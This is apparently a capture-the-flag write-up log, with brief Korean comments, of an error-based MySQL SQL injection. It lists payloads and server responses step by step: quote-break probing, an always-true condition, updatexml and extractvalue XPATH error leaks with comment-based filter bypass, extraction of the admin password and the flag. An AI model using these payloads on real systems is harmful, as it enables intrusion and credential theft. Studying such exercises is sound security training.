pay: '
res: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

pay: '||1=1#
res: 

pay: '||updatexml(null,0x3a,null)#
res: XPATH syntax error: ':'			# 에러베이스드 취약점으로 0x3a가 출력

pay: '||updatexml(null,concat(0x3a,(select/**/pw/**/from/**/users)),null)#
res: Subquery returns more than 1 row

pay: %27||updatexml(null,concat(0x3a,(select/**/pw/**/from/**/users/**/where/**/id=%27admin%27/**/limit/**/1)),null)%23
res: XPATH syntax error: ':N0named123'		# admin의 비밀번호
# '||updatexml(null,concat(0x3a,(select/**/pw/**/from/**/users/**/limit/**/1)),null)#                         # 사실 이 페이로드도 쌉가능 


pay: N0named123
res: EWHA{do_u_know_super_son?_do_u_know_kimchi?}

--------------------문제 수정-------------------
Pay: %27||id=%27admin%27%26%26extractvalue(1,concat(0x3a,(select/**/pw/**/from/**/users/**/limit/**/1,1)))%23